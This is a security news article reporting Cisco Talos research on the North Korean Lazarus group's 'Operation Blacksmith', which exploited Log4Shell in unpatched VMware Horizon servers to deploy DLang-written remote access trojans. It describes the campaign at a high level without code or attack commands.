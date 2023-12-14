Despite receiving a patch two years ago, the Log4Shell vulnerability remains a popular attack vector even for sophisticated threat actors. An example is a recently documented attack campaign against companies from several industries by the North Korean state-run Lazarus APT group. The Lazarus attackers exploited Log4Shell (CVE-2021-44228) in publicly facing and unpatched VMware Horizon servers and used their access to deploy custom remote access trojans (RATs) written in DLang, a programming language that’s not commonly used in malware development.

The campaign, dubbed Operation Blacksmith by researchers from Cisco Talos, appears to have started in March and continues to date. The attacks are more likely opportunistic in nature rather than targeted with recorded victims in the manufacturing, agricultural, and physical security sectors.

Custom remote access trojans built with uncommon technologies

The Lazarus group (APT38) is one of North Korean government's hacking teams and is usually tasked with cyberespionage and sabotage objectives. The group’s malicious activities span back many years and it shares some of its toolset and infrastructure with other North Korean APT groups.

In fact, the Talos researchers believe the Lazarus APT today is most likely an umbrella for different sub-groups that operate their own campaigns that develop bespoke malware for their targets. These sub-groups might have different objectives and don’t always coordinate with each other, despite the occasional overlap.

“During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTONIUM or Andariel,” the Talos researchers said in their new report on Operation Blacksmith. The Andariel campaign documented by Microsoft exploited CVE-2023-42793, a critical vulnerability in JetBrains TeamCity server, a CI/CD tool used in DevOps. The overlap with Lazarus’ Blacksmith operation was the use of a custom proxy tool dubbed HazyLoad that has only been observed in these two campaigns. However, the other malware implants were different.

In Blacksmith, the attackers deployed three different malware programs written in DLang, a programming language originally released in 2001 that uses C++ as inspiration but adds many features and paradigms borrowed from other languages. DLang is an unusual choice for malware development, but Lazarus is known for adopting non-traditional technologies with previous examples including QtFramework and PowerBasic.